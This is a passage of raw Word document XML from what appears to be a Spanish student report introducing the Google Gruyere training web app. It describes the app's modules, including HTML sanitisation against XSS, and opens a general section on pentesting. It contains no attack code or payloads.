                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034204 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>287</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="25BFD6C3" w14:textId="32296E6B" w:rsidR="00352926" w:rsidRDefault="00352926">
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
        <w:p w14:paraId="64ED7C5E" w14:textId="77777777" w:rsidR="00352926" w:rsidRDefault="00352926"/>
        <w:p w14:paraId="0D6908B4" w14:textId="77777777" w:rsidR="00352926" w:rsidRDefault="00352926"/>
        <w:p w14:paraId="6598E4AA" w14:textId="77777777" w:rsidR="00352926" w:rsidRDefault="00352926"/>
        <w:p w14:paraId="6D1983B6" w14:textId="77777777" w:rsidR="00352926" w:rsidRDefault="00352926"/>
        <w:p w14:paraId="2EBAE617" w14:textId="77777777" w:rsidR="00352926" w:rsidRDefault="00352926"/>
        <w:p w14:paraId="1EB845A9" w14:textId="77777777" w:rsidR="00352926" w:rsidRDefault="00352926"/>
        <w:p w14:paraId="45C8C669" w14:textId="77777777" w:rsidR="00352926" w:rsidRDefault="00352926"/>
        <w:p w14:paraId="71DD4835" w14:textId="77777777" w:rsidR="00352926" w:rsidRDefault="00352926"/>
        <w:p w14:paraId="086E65D0" w14:textId="77777777" w:rsidR="00352926" w:rsidRDefault="00352926"/>
        <w:p w14:paraId="21D37E2B" w14:textId="6380234F" w:rsidR="00C824E5" w:rsidRDefault="00C824E5" w:rsidP="008A0D40">
          <w:pPr>
            <w:pStyle w:val="Ttulo1"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="0"/>
            </w:numPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="45D7800A" w14:textId="7757E083" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="00F00B53"/>
        <w:p w14:paraId="014CFC7A" w14:textId="1A3BA9AC" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="00F00B53"/>
        <w:p w14:paraId="7DE8DC69" w14:textId="16891F83" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="00F00B53"/>
        <w:p w14:paraId="258AB4FD" w14:textId="77777777" w:rsidR="00F00B53" w:rsidRPr="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="00F00B53"/>
        <w:p w14:paraId="15601851" w14:textId="3F25D505" w:rsidR="00C824E5" w:rsidRDefault="00C824E5" w:rsidP="00C824E5">
          <w:pPr>
            <w:pStyle w:val="Ttulo1"/>
          </w:pPr>
          <w:bookmarkStart w:id="0" w:name="_Toc128034123"/>
          <w:r>
            <w:lastRenderedPageBreak/>
            <w:t>Introducción</w:t>
          </w:r>
          <w:bookmarkEnd w:id="0"/>
        </w:p>
        <w:p w14:paraId="2969F004" w14:textId="2EBEFC83" w:rsidR="00BD41C4" w:rsidRDefault="00BD41C4" w:rsidP="00BD41C4">
          <w:r>
            <w:t>Voy a explicar que aplicación web voy a usar y cómo funciona.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="00D5EE51" w14:textId="0452EB2B" w:rsidR="00BD41C4" w:rsidRDefault="00BD41C4" w:rsidP="00BD41C4">
          <w:r>
            <w:t xml:space="preserve">En mi caso </w:t>
          </w:r>
          <w:r w:rsidR="00CC3F62">
            <w:t>voy a</w:t>
          </w:r>
          <w:r>
            <w:t xml:space="preserve"> usar Google Gruyere.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7C1490E8" w14:textId="4970C6DE" w:rsidR="00C655D5" w:rsidRDefault="00C655D5" w:rsidP="00BD41C4">
          <w:r>
            <w:t>Este sitio web imita los principios de una red social muy básica, donde puedes crear un perfil de usuario (nombre, foto, mensaje anclado y sitio web…) administrarlo y publicar algunos mensajes cortos (fragmentos en este caso), por lo que tiene sentido como material de estudio.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="068A164F" w14:textId="31B0C38C" w:rsidR="005138B9" w:rsidRDefault="005138B9" w:rsidP="00BD41C4">
          <w:r>
            <w:t>La página se así cuando se inicia por primera vez (se creará un número de sesión especifico por cada vez que se inicia el servidor)</w:t>
          </w:r>
          <w:r w:rsidR="00BB2676">
            <w:t>:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="654A8D80" w14:textId="3E4A64A8" w:rsidR="0032231C" w:rsidRDefault="0032231C" w:rsidP="00BD41C4">
          <w:r w:rsidRPr="0032231C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="470452B4" wp14:editId="3C56848A">
                <wp:extent cx="5400040" cy="3110230"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="306" name="Imagen 3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n 306" descr="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                        <pic:cNvPicPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId11"/>
                        <a:stretch>
                          <a:fillRect/>
                        </a:stretch>
                      </pic:blipFill>
                      <pic:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5400040" cy="3110230"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="55E91646" w14:textId="62336C00" w:rsidR="00BB2676" w:rsidRDefault="00BB2676" w:rsidP="00BD41C4">
          <w:r>
            <w:t>Así es como se ve la página de inicio de sesión:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="120299CC" w14:textId="1B2E26C4" w:rsidR="00BB2676" w:rsidRDefault="0032231C" w:rsidP="00BB2676">
          <w:r w:rsidRPr="0032231C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5491EA58" wp14:editId="70A50517">
                <wp:extent cx="5400040" cy="2256790"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="307" name="Imagen 307"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n 307" descr="Aplicación&#10;&#10;Descripción generada automáticamente con confianza media"/>
                        <pic:cNvPicPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId12"/>
                        <a:stretch>
                          <a:fillRect/>
                        </a:stretch>
                      </pic:blipFill>
                      <pic:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5400040" cy="2256790"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="79E1616E" w14:textId="339FD3A7" w:rsidR="00BB2676" w:rsidRDefault="00BB2676" w:rsidP="00BD41C4">
          <w:r>
            <w:t>Acerca de los fragmentos: Es la palabra habitual que utiliza Google para resaltar un texto de resumen en un resultado del buscador de Google. En este contexto, un fragmento se refiere a un pequeño fragmento de texto agregado como una etiqueta, después de un nombre usuario.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="15876E56" w14:textId="05C148F5" w:rsidR="00BB2676" w:rsidRDefault="00BB2676" w:rsidP="00BD41C4">
          <w:r>
            <w:t>Ahora vamos a ver el contenido de Google gruyere:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="63188D62" w14:textId="59D91C58" w:rsidR="0032231C" w:rsidRDefault="00582B6F" w:rsidP="00BD41C4">
          <w:r w:rsidRPr="00582B6F">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52967512" wp14:editId="6BD85E6C">
                <wp:extent cx="5400040" cy="5805170"/>
                <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                <wp:docPr id="309" name="Imagen 3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n 309" descr="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                        <pic:cNvPicPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId13"/>
                        <a:stretch>
                          <a:fillRect/>
                        </a:stretch>
                      </pic:blipFill>
                      <pic:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5400040" cy="5805170"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="792153A0" w14:textId="77777777" w:rsidR="008353EE" w:rsidRDefault="008353EE" w:rsidP="00BD41C4"/>
        <w:p w14:paraId="3A4A3132" w14:textId="6641182C" w:rsidR="00BA7094" w:rsidRDefault="00BA7094" w:rsidP="00BB2676">
          <w:r>
            <w:t>Ahora voy a explicar los módulos de Gruyere:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3238A598" w14:textId="2E12D888" w:rsidR="00BA7094" w:rsidRDefault="00BA7094">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="13"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Data.py</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2409B665" w14:textId="77777777" w:rsidR="008353EE" w:rsidRDefault="008353EE" w:rsidP="008353EE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="31163228" w14:textId="7BCC679D" w:rsidR="00BA7094" w:rsidRDefault="00BA7094" w:rsidP="00BA7094">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Almacena los datos predeterminados en la base de datos. Hay una cuenta de administrador y tres usuarios </w:t>
          </w:r>
          <w:r w:rsidR="009D1E10">
            <w:t>predeterminados</w:t>
          </w:r>
          <w:r>
            <w:t>:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6BAFE1C0" w14:textId="60861CFB" w:rsidR="0032231C" w:rsidRDefault="0032231C" w:rsidP="00BA7094">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
          <w:r w:rsidRPr="0032231C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1412AFD7" wp14:editId="6452ACB1">
                <wp:extent cx="5400040" cy="5805170"/>
                <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                <wp:docPr id="304" name="Imagen 30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304" descr="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                        <pic:cNvPicPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId14"/>
                        <a:stretch>
                          <a:fillRect/>
                        </a:stretch>
                      </pic:blipFill>
                      <pic:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5400040" cy="5805170"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="0C5C0459" w14:textId="566F02D4" w:rsidR="00BA7094" w:rsidRDefault="00BA7094" w:rsidP="00BA7094"/>
        <w:p w14:paraId="2EB1418C" w14:textId="23A70421" w:rsidR="009D1E10" w:rsidRDefault="009D1E10">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="13"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>gruyere.py</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="59562BBF" w14:textId="77777777" w:rsidR="008353EE" w:rsidRDefault="008353EE" w:rsidP="008353EE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6448FF2F" w14:textId="4AEF57B8" w:rsidR="009D1E10" w:rsidRDefault="00BB200D" w:rsidP="009D1E10">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
          <w:r>
            <w:t>E</w:t>
          </w:r>
          <w:r w:rsidR="009D1E10">
            <w:t>s el servidor web de Gruyere.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="649F8C2D" w14:textId="5FBD57C4" w:rsidR="009D1E10" w:rsidRDefault="009D1E10" w:rsidP="009D1E10">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
          <w:r>
            <w:t>El código permite configurar un servidor local con las funcionalidades necesarias (creación de un directorio de trabajo, instalación de base de datos, gestión de cookies, respuestas URL/HTML, gestión del perfil de usuario, carga de datos/archivos)</w:t>
          </w:r>
          <w:r w:rsidR="006D480E">
            <w:t>.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7DDCDDEE" w14:textId="3818912E" w:rsidR="006D480E" w:rsidRDefault="006D480E" w:rsidP="009D1E10">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
          <w:r>
            <w:t>El código tiene comentarios para ayudar a comprender la lógica:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3B4C23BE" w14:textId="149FBDF3" w:rsidR="006D480E" w:rsidRDefault="0032231C" w:rsidP="006D480E">
          <w:r>
            <w:lastRenderedPageBreak/>
            <w:tab/>
          </w:r>
          <w:r w:rsidRPr="0032231C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F46BD50" wp14:editId="608A38C5">
                <wp:extent cx="5400040" cy="5805170"/>
                <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                <wp:docPr id="305" name="Imagen 3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n 305" descr="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                        <pic:cNvPicPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId15"/>
                        <a:stretch>
                          <a:fillRect/>
                        </a:stretch>
                      </pic:blipFill>
                      <pic:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5400040" cy="5805170"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="21866136" w14:textId="77777777" w:rsidR="006D480E" w:rsidRDefault="006D480E" w:rsidP="009D1E10">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="7F54B135" w14:textId="77777777" w:rsidR="006D480E" w:rsidRDefault="006D480E" w:rsidP="009D1E10">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="0B8C42FE" w14:textId="0E922467" w:rsidR="009D1E10" w:rsidRDefault="00C102F4">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="13"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>gtl.py:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="178B3FE3" w14:textId="77777777" w:rsidR="008353EE" w:rsidRDefault="008353EE" w:rsidP="008353EE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="7A0EE927" w14:textId="21961C23" w:rsidR="00C102F4" w:rsidRDefault="00C102F4" w:rsidP="008353EE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
          <w:r>
            <w:t>Gruyere Template Language (GTL) es un nuevo lenguaje de plantillas y, como sus hermanos, como Django, ayuda a crear páginas web de manera más eficiente. La documentación para GTL se puede encontrar directamente en gruyere/gtl.py:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="16C2222A" w14:textId="77777777" w:rsidR="0032231C" w:rsidRDefault="0032231C" w:rsidP="00406981">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="2D5761ED" w14:textId="3CE4AD4D" w:rsidR="0032231C" w:rsidRDefault="0032231C" w:rsidP="0032231C">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
          <w:r w:rsidRPr="0032231C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BD931F3" wp14:editId="150CA802">
                <wp:extent cx="5400040" cy="5805170"/>
                <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                <wp:docPr id="301" name="Imagen 3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descr="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                        <pic:cNvPicPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId16"/>
                        <a:stretch>
                          <a:fillRect/>
                        </a:stretch>
                      </pic:blipFill>
                      <pic:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5400040" cy="5805170"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="5789CB9B" w14:textId="38904F57" w:rsidR="00C102F4" w:rsidRDefault="00C102F4" w:rsidP="00C102F4">
          <w:pPr>
            <w:ind w:left="360"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="3327908E" w14:textId="77777777" w:rsidR="00C102F4" w:rsidRDefault="00C102F4" w:rsidP="00C102F4">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="0D77DBD1" w14:textId="541EB158" w:rsidR="00C102F4" w:rsidRDefault="003506BE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="13"/>
            </w:numPr>
          </w:pPr>
          <w:bookmarkStart w:id="1" w:name="_Hlk128301114"/>
          <w:r>
            <w:t>sanitize.py:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="38865A8E" w14:textId="77777777" w:rsidR="008353EE" w:rsidRDefault="008353EE" w:rsidP="008353EE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="68ACB007" w14:textId="6850B266" w:rsidR="003506BE" w:rsidRDefault="00A97529" w:rsidP="003506BE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
          <w:r>
            <w:t>E</w:t>
          </w:r>
          <w:r w:rsidR="003506BE">
            <w:t xml:space="preserve">s el </w:t>
          </w:r>
          <w:r w:rsidR="005971FC">
            <w:t>módulo</w:t>
          </w:r>
          <w:r w:rsidR="003506BE">
            <w:t xml:space="preserve"> de Gruyere encargado para desinfectar el HTML, para proteger la aplicación de agujeros de seguridad.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="192C8587" w14:textId="4F0D2801" w:rsidR="003506BE" w:rsidRDefault="003506BE" w:rsidP="003506BE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
          <w:r>
            <w:t>El saneamiento HTML es el proceso de examinar un documento HTML y producir uno nuevo que conservar solo las etiquetas designadas como seguras y deseadas.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="583AEBF7" w14:textId="380A3965" w:rsidR="003506BE" w:rsidRDefault="003506BE" w:rsidP="003506BE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
          <w:r>
            <w:t>El saneamiento de HTML se puede utilizar para protegerse contra ataques como secuencias de comandos entre sitios (XSS) mediante el saneamiento de cualquier código HTML enviado por el usuario.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7B489A26" w14:textId="1891D895" w:rsidR="003506BE" w:rsidRDefault="003506BE" w:rsidP="003506BE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
          <w:r>
            <w:t>Por ejemplo, las etiquetas como &lt;script&lt; normalmente se eliminan durante el proceso de desinfección. El proceso generalmente se basa en una lista blanca de etiquetas permitidas y una lista negra de etiquetas no permitidas, en este caso aquí están las etiquetas permitidas, y no permitidas:</w:t>
          </w:r>
        </w:p>
        <w:bookmarkEnd w:id="1"/>
        <w:p w14:paraId="2E2E9DA7" w14:textId="005AC1D7" w:rsidR="0032231C" w:rsidRDefault="0032231C" w:rsidP="003506BE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
          <w:r w:rsidRPr="0032231C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34CAF600" wp14:editId="08A90AD8">
                <wp:extent cx="5400040" cy="5805170"/>
                <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                <wp:docPr id="300" name="Imagen 30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300" descr="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                        <pic:cNvPicPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId17"/>
                        <a:stretch>
                          <a:fillRect/>
                        </a:stretch>
                      </pic:blipFill>
                      <pic:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5400040" cy="5805170"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="4A7308B4" w14:textId="28DBEFF8" w:rsidR="003506BE" w:rsidRDefault="003506BE" w:rsidP="003506BE"/>
        <w:p w14:paraId="31A00CAD" w14:textId="209F6A1B" w:rsidR="009F398F" w:rsidRDefault="009F398F" w:rsidP="009F398F">
          <w:pPr>
            <w:ind w:left="705"/>
          </w:pPr>
          <w:r>
            <w:t>El directorio de recurso contiene todo el código CSS, las imágenes, los archivos de plantilla y una biblioteca de JavaScript.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3242DF08" w14:textId="77777777" w:rsidR="003506BE" w:rsidRDefault="003506BE" w:rsidP="003506BE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6E1E52BE" w14:textId="77777777" w:rsidR="003506BE" w:rsidRDefault="003506BE" w:rsidP="003506BE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="25698F30" w14:textId="77777777" w:rsidR="003506BE" w:rsidRDefault="003506BE" w:rsidP="0032231C">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6CB1EC4B" w14:textId="77777777" w:rsidR="009D1E10" w:rsidRDefault="009D1E10" w:rsidP="009D1E10"/>
        <w:p w14:paraId="28037E79" w14:textId="77777777" w:rsidR="00BA7094" w:rsidRDefault="00BA7094" w:rsidP="00BA7094">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="32F5E832" w14:textId="77777777" w:rsidR="00BB2676" w:rsidRDefault="00BB2676" w:rsidP="00BD41C4"/>
        <w:p w14:paraId="1BF32B59" w14:textId="77777777" w:rsidR="00BB2676" w:rsidRDefault="00BB2676" w:rsidP="00BD41C4"/>
        <w:p w14:paraId="0DDDBEAC" w14:textId="77777777" w:rsidR="00386122" w:rsidRPr="00BD41C4" w:rsidRDefault="00386122" w:rsidP="00BD41C4"/>
        <w:p w14:paraId="7794671B" w14:textId="362FC6E2" w:rsidR="00C824E5" w:rsidRDefault="00C824E5" w:rsidP="00C824E5">
          <w:pPr>
            <w:pStyle w:val="Ttulo1"/>
          </w:pPr>
          <w:bookmarkStart w:id="2" w:name="_Toc128034124"/>
          <w:r>
            <w:lastRenderedPageBreak/>
            <w:t>Documentación</w:t>
          </w:r>
          <w:bookmarkEnd w:id="2"/>
        </w:p>
        <w:p w14:paraId="61ED9F45" w14:textId="2F183337" w:rsidR="00406981" w:rsidRDefault="00406981" w:rsidP="00406981"/>
        <w:p w14:paraId="4E71978D" w14:textId="0F15C80C" w:rsidR="000E194E" w:rsidRDefault="00675035">
          <w:pPr>
            <w:pStyle w:val="Ttulo2"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="14"/>
            </w:numPr>
          </w:pPr>
          <w:bookmarkStart w:id="3" w:name="_Toc128034125"/>
          <w:r>
            <w:t>Introducción</w:t>
          </w:r>
          <w:r w:rsidR="000E194E">
            <w:t>.</w:t>
          </w:r>
          <w:bookmarkEnd w:id="3"/>
        </w:p>
        <w:p w14:paraId="0839A725" w14:textId="77777777" w:rsidR="000E194E" w:rsidRPr="000E194E" w:rsidRDefault="000E194E" w:rsidP="000E194E"/>
        <w:p w14:paraId="1A16EAD3" w14:textId="56FF3CFA" w:rsidR="000E194E" w:rsidRDefault="000E194E" w:rsidP="000E194E">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>La seguridad informática es un área que ha estado cobrando mayor importancia dentro de las organizaciones que usan las tecnologías de la información y la comunicación para realizar sus actividades (comerciales, financieras, sociales) y la preocupación por este campo va en aumento ya que hay miles de maneras de sabotear una red informática, sus dispositivos de comunicación, aplicaciones, bases de datos. Los propósitos pueden ser muy variados: ro</w:t>
          </w:r>
          <w:r w:rsidR="00675035">
            <w:t>bo</w:t>
          </w:r>
          <w:r>
            <w:t xml:space="preserve"> de información, sabotaje</w:t>
          </w:r>
          <w:r w:rsidR="00675035">
            <w:t>, espionaje, diversión, para probar nuevas técnicas o casi por cualquier motivo.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="18D32E32" w14:textId="386C047D" w:rsidR="00675035" w:rsidRDefault="00675035" w:rsidP="000E194E">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Para esto se usa una prueba de pentesting, que es una herramienta de </w:t>
          </w:r>
          <w:r w:rsidR="00713289">
            <w:t>diagnóstico</w:t>
          </w:r>
          <w:r>
            <w:t xml:space="preserve"> que revela la manera de operar de un intruso para lograr el acceso no autorizado a los sistemas de información en otras palabras se simula un ataque tal como lo haría un cibercriminal.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2DBE4A6E" w14:textId="77777777" w:rsidR="00713289" w:rsidRDefault="00713289" w:rsidP="00713289">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Este proyecto explorará la capacidad de la aplicación web Google Gruyere, usando las herramientas necesarias y soportadas por una aplicación web.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="22F50B46" w14:textId="77777777" w:rsidR="00713289" w:rsidRDefault="00713289" w:rsidP="000E194E">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="1D5460D6" w14:textId="309ECEFB" w:rsidR="00713289" w:rsidRDefault="0011413D">
          <w:pPr>
            <w:pStyle w:val="Ttulo2"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="14"/>
            </w:numPr>
          </w:pPr>
          <w:bookmarkStart w:id="4" w:name="_Toc128034126"/>
          <w:r>
            <w:t>Descripción de la empresa</w:t>
          </w:r>
          <w:bookmarkEnd w:id="4"/>
        </w:p>
        <w:p w14:paraId="57773AE4" w14:textId="141B1BA7" w:rsidR="0011413D" w:rsidRDefault="0011413D" w:rsidP="0011413D">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6F009727" w14:textId="23CC34F7" w:rsidR="0011413D" w:rsidRDefault="0011413D" w:rsidP="0011413D">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
